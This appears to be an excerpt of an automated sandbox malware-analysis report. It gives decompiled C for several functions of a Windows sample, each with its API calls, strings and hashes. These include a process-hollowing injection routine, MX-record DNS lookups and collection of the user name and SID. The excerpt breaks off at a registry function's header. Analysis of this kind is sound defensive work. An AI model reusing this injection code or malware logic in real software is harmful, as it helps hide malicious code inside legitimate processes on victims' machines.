Opcode Fuzzy Hash: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
Instruction Fuzzy Hash: CF51F3706043465ED728EB21EF49B9A3BD4BB04318F10447FE605E62E2DBFC9494CA1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C2DC, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 182
threadCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040C2DC(void* __ebp, signed int _a4) {
				void* _t86;
				signed int _t90;
				signed int _t91;
				long _t93;
				signed int _t95;
				signed int _t101;
				signed int _t108;
				signed int _t112;
				signed int _t115;
				long _t117;
				long _t118;
				signed int _t120;
				struct _SECURITY_ATTRIBUTES* _t122;
				signed int _t123;
				signed int _t132;
				signed int _t148;
				signed char _t151;
				signed int _t154;
				signed int _t156;
				signed char* _t157;
				void* _t158;
				signed int _t163;

				_t158 = __ebp;
				_t157 = _a4;
				E0040A4C7(_t157);
				_t122 = 0;
				if(_t157[0x44] == 0) {
					_t157[8] = 0;
					_t157[0x34] = 0;
					_t157[0x38] = 0;
					_t157[0x3c] = 0;
					_t157[0x54] = 0;
					_t157[0x40] = 0;
					_t157[0x58] = 0;
					L31:
					_t82 =  &(_t157[4]); // 0x40c4e4
					_t86 = _t82;
					_t148 =  !( *_t157) & 0x00000001;
					_t157[0x5c] = _t122;
					_t84 =  &(_t157[8]); // 0xfffffdf0
					if( *_t86 >=  *_t84) {
						L34:
						return _t86;
					}
					_t86 = CreateThread(_t122, _t122, E0040B535, InterlockedIncrement(_t86) | _t148 << 0x00000010, _t122, _t122);
					if(_t86 == _t122) {
						goto L34;
					}
					return CloseHandle(_t86);
				}
				if(_t157[8] != 0) {
					__eflags = _t157[0x48];
					if(_t157[0x48] == 0) {
						L5:
						_t12 =  &(_t157[0x10]); // 0x59be026a
						_t90 =  *_t12;
						_t157[8] = _t90;
						_t157[0x34] = _t90;
						_t91 = _t90 * 0x3e8;
						__eflags = _t91;
						_t157[0x38] = _t122;
						_t157[0x3c] = _t122;
						_t157[0x1c] = _t90 * 0x2710;
						_t157[0x20] = _t91;
						goto L6;
					}
					_t118 = GetTickCount();
					_t11 =  &(_t157[0x48]); // 0x13740041
					__eflags = _t118 -  *_t11 - 0x927c0;
					if(_t118 -  *_t11 < 0x927c0) {
						goto L6;
					}
					goto L5;
				} else {
					_t4 =  &(_t157[0xc]); // 0x5756c359
					_t120 =  *_t4;
					_t157[0x1c] = _t120 * 0x2710;
					_t157[8] = _t120;
					_t157[0x20] = _t120 * 0x3e8;
					_t157[0x34] = _t120;
					_t157[0x48] = GetTickCount();
					L6:
					if(( *_t157 & 0x00000001) == 0) {
						_t73 =  &(_t157[0x34]); // 0xa1c35e5f
						_t157[8] =  *_t73;
						goto L31;
					}
					_t93 = GetTickCount();
					_t21 =  &(_t157[0x4c]); // 0x26fce850
					if(_t93 -  *_t21 >= 0x2710) {
						goto L31;
					}
					if(_t157[0x54] == _t122) {
						_t95 = 0x3e8;
					} else {
						_t117 = GetTickCount();
						_t23 =  &(_t157[0x54]); // 0x41366c1d
						_t95 = _t117 -  *_t23;
					}
					_t123 = _t95;
					if(_t95 < 1) {
						_t123 = 1;
					}
					if(_t123 > 0x4e20) {
						_t123 = 0x4e20;
					}
					_t24 =  &(_t157[0x58]); // 0x701d8900
					_t25 =  &(_t157[0x40]); // 0x74c33b57
					_t151 =  *_t25;
					_t132 =  *_t24 * 0x3e8;
					_push(_t158);
					asm("cdq");
					_push(0x14);
					_a4 = _t123;
					asm("cdq");
					_t101 = (_t132 - _t151) * _t123 / 0x3e8 / 0x3e8;
					if(_t101 == 0) {
						__eflags = _t132 - _t151;
						if(__eflags == 0) {
							goto L22;
						}
						if(__eflags >= 0) {
							_t156 = _t151 + 1;
							__eflags = _t156;
						} else {
							_t156 = _t151 - 1;
						}
						goto L21;
					} else {
						_t156 = _t151 + _t101;
						L21:
						_t157[0x40] = _t156;
						L22:
						if(_t157[0x40] < 0) {
							_t157[0x40] = _t157[0x40] & 0x00000000;
						}
						_t39 =  &(_t157[0x40]); // 0x74c33b57
						_t163 = (0xc8 -  *_t39) * 0x14;
						if(_t123 > 0x3e8) {
							_a4 = 0x3e8;
						}
						asm("cdq");
						_t46 =  &(_t157[0x14]); // 0x5f004120
						_t47 =  &(_t157[0x10]); // 0x59be026a
						asm("cdq");
						_t49 =  &(_t157[0x30]); // 0xe4754f45
						_t54 =  &(_t157[0x20]); // 0x406a0000
						_t108 = E0040A505(_t163 * _a4 / 0x3e8 /  *_t49 +  *_t54,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
						asm("cdq");
						_t56 =  &(_t157[0x2c]); // 0xc68314c4
						_t157[0x20] = _t108;
						_t112 = E0040A505(_t163 /  *_t56 + _t108,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
						asm("cdq");
						_t122 = 0;
						_t157[0x58] = 0;
						_t154 = _t112 / 0x3e8;
						_t157[0x54] = GetTickCount();
						_t68 =  &(_t157[0x34]); // 0xa1c35e5f
						_t115 =  *_t68;
						if(_t115 <= _t154) {
							_t157[8] = _t115;
							_t157[0x20] = _t115 * 0x3e8;
						} else {
							_t157[8] = _t154;
							_t157[0x1c] = _t154 * 0x2710;
						}
						goto L31;
					}
				}
			}

0x0040c2dc
0x0040c2de
0x0040c2e4
0x0040c2e9
0x0040c2ef
0x0040c482
0x0040c485
0x0040c488
0x0040c48b
0x0040c48e
0x0040c491
0x0040c494
0x0040c497
0x0040c499
0x0040c499
0x0040c4a0
0x0040c4a3
0x0040c4a6
0x0040c4a9
0x0040c4d5
0x0040c4d5
0x0040c4d5
0x0040c4c1
0x0040c4c9
0x00000000
0x00000000
0x00000000
0x0040c4cc
0x0040c2fe
0x0040c326
0x0040c329
0x0040c337
0x0040c337
0x0040c337
0x0040c342
0x0040c345
0x0040c348
0x0040c348
0x0040c34e
0x0040c351
0x0040c354
0x0040c357
0x00000000
0x0040c357
0x0040c32b
0x0040c32d
0x0040c330
0x0040c335
0x00000000
0x00000000
0x00000000
0x0040c300
0x0040c300
0x0040c300
0x0040c30b
0x0040c316
0x0040c319
0x0040c31c
0x0040c321
0x0040c35a
0x0040c35d
0x0040c47a
0x0040c47d
0x00000000
0x0040c47d
0x0040c363
0x0040c365
0x0040c36d
0x00000000
0x00000000
0x0040c376
0x0040c37f
0x0040c378
0x0040c378
0x0040c37a
0x0040c37a
0x0040c37a
0x0040c384
0x0040c389
0x0040c38d
0x0040c38d
0x0040c395
0x0040c397
0x0040c397
0x0040c399
0x0040c39c
0x0040c39c
0x0040c39f
0x0040c3ac
0x0040c3ad
0x0040c3b5
0x0040c3b8
0x0040c3bc
0x0040c3bd
0x0040c3c1
0x0040c3c7
0x0040c3c9
0x00000000
0x00000000
0x0040c3cb
0x0040c3d0
0x0040c3d0
0x0040c3cd
0x0040c3cd
0x0040c3cd
0x00000000
0x0040c3c3
0x0040c3c3
0x0040c3d1
0x0040c3d1
0x0040c3d4
0x0040c3d8
0x0040c3da
0x0040c3da
0x0040c3e3
0x0040c3eb
0x0040c3f0
0x0040c3f2
0x0040c3f2
0x0040c3fd
0x0040c405
0x0040c408
0x0040c419
0x0040c41a
0x0040c41d
0x0040c421
0x0040c42a
0x0040c42b
0x0040c430
0x0040c436
0x0040c43b
0x0040c443
0x0040c448
0x0040c44b
0x0040c453
0x0040c456
0x0040c456
0x0040c45c
0x0040c46c
0x0040c475
0x0040c45e
0x0040c45e
0x0040c467
0x0040c467
0x00000000
0x0040c45c
0x0040c3c1

APIs

Part of subcall function 0040A4C7: GetTickCount.KERNEL32 ref: 0040A4D1
Part of subcall function 0040A4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA

GetTickCount.KERNEL32 ref: 0040C31F
GetTickCount.KERNEL32 ref: 0040C32B
GetTickCount.KERNEL32 ref: 0040C363
GetTickCount.KERNEL32 ref: 0040C378
GetTickCount.KERNEL32 ref: 0040C44D
InterlockedIncrement.KERNEL32(0040C4E4), ref: 0040C4AE
CreateThread.KERNEL32(00000000,00000000,0040B535,00000000,?,0040C4E0), ref: 0040C4C1
CloseHandle.KERNEL32(00000000,?,0040C4E0,00413588,00408810), ref: 0040C4CC

Strings

localcfg, xrefs: 0040C2DD

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
String ID: localcfg
API String ID: 1553760989-1857712256
Opcode ID: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
Instruction ID: d79c9f10581ee3273b6165e92ba068ddd4f199cf4cd09fd02743c11af2233124
Opcode Fuzzy Hash: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
Instruction Fuzzy Hash: 0E515CB1A00B41CFC7249F6AC5D552ABBE9FB48304B509A3FE58BD7A90D778F8448B14

Uniqueness

Uniqueness Score: -1.00%

Function 00402D21, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 85
memorylibrarystringCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00402D21(intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				char _v28;
				struct HINSTANCE__* _t19;
				_Unknown_base(*)()* _t20;
				long* _t30;
				intOrPtr* _t37;
				long _t39;
				long _t40;
				void* _t41;

				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_t19 = GetModuleHandleA( &_v28);
				_t39 = 0;
				if(_t19 != 0) {
					L3:
					_t20 = GetProcAddress(_t19, "DnsQuery_A");
					if(_t20 == _t39) {
						L2:
						return 0;
					}
					_push(_t39);
					_t35 =  &_v16;
					_push( &_v16);
					_push(_t39);
					_push(_t39);
					_push(0xf);
					_push(_a4);
					if( *_t20() != 0) {
						goto L2;
					}
					_t37 = _v16;
					_v8 = _t39;
					_v12 = _t39;
					if(_t37 == _t39) {
						L14:
						return _v12;
					}
					do {
						if( *((short*)(_t37 + 8)) != 0xf) {
							goto L12;
						}
						_t40 = HeapAlloc(GetProcessHeap(), _t39, 0x108);
						if(_t40 == 0) {
							break;
						}
						E0040EE2A(_t35, _t40, 0, 0x108);
						_t41 = _t41 + 0xc;
						 *(_t40 + 4) =  *(_t37 + 0x1c) & 0x0000ffff;
						_t13 = _t40 + 8; // 0x8
						lstrcpynA(_t13,  *(_t37 + 0x18), 0xff);
						_t30 = _v8;
						_v8 = _t40;
						if(_t30 != 0) {
							 *_t30 = _t40;
						} else {
							_v12 = _t40;
						}
						L12:
						_t37 =  *_t37;
						_t39 = 0;
					} while (_t37 != 0);
					goto L14;
				}
				_t19 = LoadLibraryA( &_v28);
				if(_t19 != 0) {
					goto L3;
				}
				goto L2;
			}

0x00402d31
0x00402d32
0x00402d33
0x00402d39
0x00402d3a
0x00402d40
0x00402d44
0x00402d5b
0x00402d61
0x00402d69
0x00402d54
0x00000000
0x00402d54
0x00402d6b
0x00402d6c
0x00402d6f
0x00402d70
0x00402d71
0x00402d72
0x00402d74
0x00402d7b
0x00000000
0x00000000
0x00402d7d
0x00402d80
0x00402d83
0x00402d88
0x00402deb
0x00000000
0x00402deb
0x00402d90
0x00402d95
0x00000000
0x00000000
0x00402da6
0x00402daa
0x00000000
0x00000000
0x00402db0
0x00402db9
0x00402dc1
0x00402dc7
0x00402dcb
0x00402dd1
0x00402dd4
0x00402dd9
0x00402de0
0x00402ddb
0x00402ddb
0x00402ddb
0x00402de2
0x00402de2
0x00402de4
0x00402de6
0x00000000
0x00402dea
0x00402d4a
0x00402d52
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000,73BCEA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
LoadLibraryA.KERNEL32(?), ref: 00402D4A
GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 00402D61
GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 00402D99
HeapAlloc.KERNEL32(00000000), ref: 00402DA0
lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 00402DCB

Strings

dnsapi.dll, xrefs: 00402D29
DnsQuery_A, xrefs: 00402D5B

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcesslstrcpyn
String ID: DnsQuery_A$dnsapi.dll
API String ID: 3560063639-3847274415
Opcode ID: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
Instruction ID: e5e1ee734cbcfb8ca4eff609f7c37a2f42b45bda1feb54b0ffc2340cedddb21a
Opcode Fuzzy Hash: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
Instruction Fuzzy Hash: 25214F7190022AABCB11AB55DD48AEFBBB8EF08750F104432F905B7290D7F49E8587D8

Uniqueness

Uniqueness Score: -1.00%

Function 00406CC9, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 84
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00406CC9(void* __ecx) {
				_Unknown_base(*)()* _t8;
				CHAR* _t17;
				void* _t18;
				void* _t23;
				char _t25;
				void* _t34;

				_t23 = __ecx;
				if( *0x412e08 != 0) {
					L14:
					return 0x412e08;
				}
				_t8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetSystemWow64DirectoryA");
				if(_t8 == 0) {
					L4:
					if(GetSystemDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
						if(GetWindowsDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
							E0040EF00(0x412e08, E00402544(0x4122f8, 0x410664, 0xb, 0xe4, 0xc8));
							E0040EE2A(_t23, 0x4122f8, 0, 0x100);
							_t34 = _t34 + 0x28;
						}
						E0040EF1E(0x412e08, E00402544(0x4122f8, 0x410658, 0xb, 0xe4, 0xc8));
						E0040EE2A(_t23, 0x4122f8, 0, 0x100);
					}
					L10:
					_t17 = 0x412e08;
					goto L11;
					L11:
					_t25 =  *_t17;
					_t17 =  &(_t17[1]);
					if(_t25 != 0) {
						goto L11;
					} else {
						_t18 = _t17 - 0x412e09;
						if( *((char*)(_t18 + 0x412e07)) != 0x5c) {
							 *((char*)(_t18 + 0x412e08)) = 0x5c;
							 *((char*)(_t18 + 0x412e09)) = _t25;
						}
						goto L14;
					}
				}
				_push(0x104);
				_push(0x412e08);
				if( *_t8() == 0 ||  *0x412e08 == 0) {
					goto L4;
				} else {
					goto L10;
				}
			}

0x00406cc9
0x00406cd6
0x00406dbe
0x00406dc1
0x00406dc1
0x00406cee
0x00406cfb
0x00406d12
0x00406d1c
0x00406d40
0x00406d60
0x00406d69
0x00406d6e
0x00406d6e
0x00406d86
0x00406d8f
0x00406d98
0x00406d99
0x00406d99
0x00406d9e
0x00406d9f
0x00406d9f
0x00406da1
0x00406da4
0x00000000
0x00406da6
0x00406da6
0x00406daf
0x00406db1
0x00406db8
0x00406db8
0x00000000
0x00406daf
0x00406da4
0x00406cfd
0x00406cfe
0x00406d03
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,PromptOnSecureDesktop,000000E4,00406DDC,000000C8), ref: 00406CE7
GetProcAddress.KERNEL32(00000000), ref: 00406CEE
GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00406D14
GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B

Strings

PromptOnSecureDesktop, xrefs: 00406CDC, 00406D36, 00406D58, 00406D68, 00406D7E, 00406D8E
GetSystemWow64DirectoryA, xrefs: 00406CDD
kernel32, xrefs: 00406CE2
C:\Windows\SysWOW64\, xrefs: 00406CC9, 00406CD1, 00406CFE, 00406D05, 00406D13, 00406D1E, 00406D2A, 00406D42, 00406D5F, 00406D85

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: Directory$AddressHandleModuleProcSystemWindows
String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$PromptOnSecureDesktop$kernel32
API String ID: 1082366364-2834986871
Opcode ID: 174e8731fdbdc44ab974895aa40a4ab233de6b35a5efa5658db69bb206ac9e39
Instruction ID: 283af98db633f334a3c96cb566aa979ace8a56c3c0d7b64ee1e11c7fdc897f47
Opcode Fuzzy Hash: 174e8731fdbdc44ab974895aa40a4ab233de6b35a5efa5658db69bb206ac9e39
Instruction Fuzzy Hash: AC21F26174034479F72157225D89FF72E4C8F52744F19407AF804B62D2CAED88E582AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040977C, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82
threadinjectionprocessCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040977C(void* __ecx, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				void _v24;
				char _v28;
				struct _STARTUPINFOA _v96;
				struct _CONTEXT _v812;
				void* _t33;

				_t46 = __ecx;
				E0040EE2A(__ecx,  &_v96, 0, 0x44);
				_v96.cb = 0x44;
				if(CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v96,  &_v20) != 0) {
					E0040EE2A(_t46,  &_v812, 0, 0x2cc);
					_v812.ContextFlags = 0x10002;
					if(GetThreadContext(_v20.hThread,  &_v812) != 0) {
						_t33 = E0040637C(_entry_, _v20.hProcess,  &_v28,  &_v24);
						_push(0);
						if(_t33 == 0) {
							L4:
							TerminateProcess(_v20.hProcess, ??);
							goto L1;
						}
						if(WriteProcessMemory(_v20, _v812.Ebx + 8,  &_v24, 4, ??) == 0) {
							goto L3;
						}
						_v812.Eax = _v28;
						if(SetThreadContext(_v20.hThread,  &_v812) == 0) {
							goto L3;
						}
						ResumeThread(_v20.hThread);
						return 1;
					}
					L3:
					_push(0);
					goto L4;
				}
				L1:
				return 0;
			}

0x0040977c
0x0040978f
0x004097a9
0x004097b9
0x004097cf
0x004097e1
0x004097f3
0x00409811
0x00409819
0x0040981c
0x004097f6
0x004097f9
0x00000000
0x004097f9
0x00409839
0x00000000
0x00000000
0x0040983e
0x00409856
0x00000000
0x00000000
0x0040985b
0x00000000
0x00409863
0x004097f5
0x004097f5
0x00000000
0x004097f5
0x004097bb
0x00000000

APIs

CreateProcessA.KERNEL32(00000000,00409947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,PromptOnSecureDesktop), ref: 004097B1
GetThreadContext.KERNEL32(?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 004097EB
TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 004097F9
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 00409831
SetThreadContext.KERNEL32(?,00010002,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 0040984E
ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 0040985B

Strings

PromptOnSecureDesktop, xrefs: 00409785
D, xrefs: 004097A9

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
String ID: D$PromptOnSecureDesktop
API String ID: 2981417381-1403908072
Opcode ID: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
Instruction ID: 6dc29e085b1385aad622296cf5a9b119a202239bcf48ce0aeeb22bf7d7f748db
Opcode Fuzzy Hash: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
Instruction Fuzzy Hash: 54216DB2901119BBDB119FA1DC49EEF7B7CEF05750F004071B909F2191EB759A44CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406F5F, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00406F5F(long _a4, long _a8) {
				void* _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				void _v84;
				char _v212;
				CHAR* _t36;
				void* _t53;
				intOrPtr* _t54;
				char _t62;
				void* _t65;
				char* _t66;
				intOrPtr _t67;
				CHAR* _t68;
				void* _t69;

				_t68 = _a4;
				 *_t68 = 0;
				if(GetUserNameA(_t68,  &_a8) == 0) {
					return 0;
				}
				_t36 = _t68;
				_t66 =  &(_t36[1]);
				do {
					_t62 =  *_t36;
					_t36 =  &(_t36[1]);
				} while (_t62 != 0);
				_a8 = _t36 - _t66;
				_a4 = 0x7c;
				_v12 = 0x80;
				if(LookupAccountNameA(0, _t68,  &_v84,  &_a4,  &_v212,  &_v12,  &_v16) == 0) {
					L8:
					_a8 = _a8 + wsprintfA( &(_t68[_a8]), "/%d", E00406EDD());
					return _a8;
				}
				E0040EF00( &(_t68[_a8]), "/");
				_a8 = _a8 + 1;
				_push( &_v8);
				_t53 =  &_v84;
				_push(_t53);
				L0040F4AA();
				if(_t53 == 0) {
					goto L8;
				}
				_t54 = _v8;
				_t20 = _t54 + 1; // 0x121
				_t65 = _t20;
				do {
					_t67 =  *_t54;
					_t54 = _t54 + 1;
				} while (_t67 != 0);
				_a4 = _t54 - _t65;
				E0040EE08( &(_t68[_a8]), _v8, _t54 - _t65 + 1);
				_a8 = _a8 + _a4;
				_t69 = _t69 + 0xc;
				LocalFree(_v8);
				goto L8;
			}

0x00406f6c
0x00406f77
0x00406f82
0x00000000
0x00407047
0x00406f88
0x00406f8a
0x00406f8d
0x00406f8d
0x00406f8f
0x00406f90
0x00406f96
0x00406fb3
0x00406fba
0x00406fc9
0x00407025
0x0040703f
0x00000000
0x00407042
0x00406fd6
0x00406fdb
0x00406fe3
0x00406fe4
0x00406fe7
0x00406fe8
0x00406fef
0x00000000
0x00000000
0x00406ff1
0x00406ff4
0x00406ff4
0x00406ff7
0x00406ff7
0x00406ff9
0x00406ffa
0x00407000
0x0040700e
0x00407016
0x00407019
0x0040701f
0x00000000

APIs

GetUserNameA.ADVAPI32(?,0040D7C3), ref: 00406F7A
LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,0040D7C3), ref: 00406FC1
ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 00406FE8
LocalFree.KERNEL32(00000120), ref: 0040701F
wsprintfA.USER32 ref: 00407036

Strings

/%d, xrefs: 00407030
|, xrefs: 00406FB3

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
String ID: /%d$|
API String ID: 676856371-4124749705
Opcode ID: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
Instruction ID: 25602f0bb6ce76eb5d01febd46d0227a680cec7408ef54ec30c82d1084126da1
Opcode Fuzzy Hash: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
Instruction Fuzzy Hash: B5313C72900209BFDB01DFA5DC45BDB7BBCEF04314F048166F949EB241DA79EA588B98

Uniqueness

Uniqueness Score: -1.00%

Function 00406BA7, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00406BA7(CHAR* _a4) {
				long _v8;
				long _v12;
				long _t14;
				int _t19;
				void* _t28;
				void* _t39;

				_push(_t30);
				if(IsBadCodePtr( *0x4130ac) == 0) {
					_push( &_v8);
					_push(0);
					if( *0x4130ac() == 0) {
						_t28 = E0040EBCC(_v8);
						if(_t28 == 0) {
							L7:
							_t14 = 0;
						} else {
							_push( &_v8);
							_push(_t28);
							if( *0x4130ac() == 0) {
								_v12 = 0;
								_t39 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
								if(_t39 != 0xffffffff) {
									_t19 = WriteFile(_t39, _t28, _v8,  &_v12, 0);
									_push(_t39);
									if(_t19 != 0) {
										CloseHandle();
										E0040EC2E(_t28);
										_t14 = _v8;
									} else {
										CloseHandle();
										DeleteFileA(_a4);
										goto L9;
									}
								} else {
									L9:
									E0040EC2E(_t28);
									_t14 = 0;
								}
							} else {
								E0040EC2E(_t28);
								goto L7;
							}
						}
					} else {
						_t14 = 0;
					}
					return _t14;
				} else {
					return 0;
				}
			}

0x00406bab
0x00406bba
0x00406bc4
0x00406bc7
0x00406bd2
0x00406be4
0x00406be9
0x00406c03
0x00406c03
0x00406beb
0x00406bee
0x00406bef
0x00406bfa
0x00406c1a
0x00406c23
0x00406c28
0x00406c3e
0x00406c44
0x00406c47
0x00406c5a
0x00406c61
0x00406c66
0x00406c49
0x00406c49
0x00406c52
0x00000000
0x00406c52
0x00406c2a
0x00406c2a
0x00406c2b
0x00406c30
0x00406c30
0x00406bfc
0x00406bfd
0x00000000
0x00406c02
0x00406bfa
0x00406bd4
0x00406bd4
0x00406bd4
0x00406c6e
0x00406bbc
0x00406bbf
0x00406bbf

APIs

IsBadCodePtr.KERNEL32 ref: 00406BB2

Strings

PromptOnSecureDesktop, xrefs: 00406BC0

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: Code
String ID: PromptOnSecureDesktop
API String ID: 3609698214-2980165447
Opcode ID: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
Instruction ID: deae59b9a6c18e17a8054c2740d34a6eafe128a66e3352cd220e92de8f8b68f4
Opcode Fuzzy Hash: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
Instruction Fuzzy Hash: D7218B72208115FFEB10ABB1ED49EDF3EACDB08364B218436F543F1091EA799A50966C

Uniqueness

Uniqueness Score: -1.00%

Function 00409064, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83
filestringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00409064(void* __eflags, void* _a4, CHAR* _a8) {
				long _v8;
				char _v1032;
				signed int _t29;
				signed int _t62;
				void* _t64;

				GetTempPathA(0x400,  &_v1032);
				E00408274( &_v1032);
				_t29 = E0040ECA5();
				_t62 = 9;
				_push(_t29 % _t62);
				_push(E0040ECA5() % _t62);
				_push(E0040ECA5() % _t62);
				_push(E0040ECA5() % _t62);
				_push( &_v1032);
				wsprintfA(_a8, E00402544(0x4122f8, 0x410794, 0xf, 0xe4, 0xc8));
				E0040EE2A(_t62, 0x4122f8, 0, 0x100);
				_t64 = CreateFileA(_a8, 0x40000000, 0, 0, 2, 0, 0);
				if(_t64 <= 0) {
					return 0;
				}
				WriteFile(_t64, _a4, lstrlenA(_a4),  &_v8, 0);
				CloseHandle(_t64);
				return 1;
			}

0x0040907b
0x00409088
0x0040908e
0x00409095
0x0040909c
0x004090a8
0x004090b4
0x004090c9
0x004090ca
0x004090e9
0x004090f8
0x00409114
0x00409118
0x00000000
0x0040913f
0x0040912d
0x00409134
0x00000000

APIs

GetTempPathA.KERNEL32(00000400,?,00000000,PromptOnSecureDesktop), ref: 0040907B
wsprintfA.USER32 ref: 004090E9
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
CloseHandle.KERNEL32(00000000), ref: 00409134

Strings

PromptOnSecureDesktop, xrefs: 0040906D, 004090C4, 004090DC, 004090F7

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
String ID: PromptOnSecureDesktop
API String ID: 2439722600-2980165447
Opcode ID: f28af15f22a92dcef6476bc2819c454602b50741f9449e0ae3514995eeab5b50
Instruction ID: 58bbe077760212e8da181cf829ffda1a70542de1f4ba4b23f7e3a80b8f6fba70
Opcode Fuzzy Hash: f28af15f22a92dcef6476bc2819c454602b50741f9449e0ae3514995eeab5b50
Instruction Fuzzy Hash: 451175B26401147AF7246723DD0AFEF3A6DDBC8704F04C47AB70AB50D1EAB94A519668

Uniqueness

Uniqueness Score: -1.00%

Function 0040E3CA, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 136
registryCOMMON

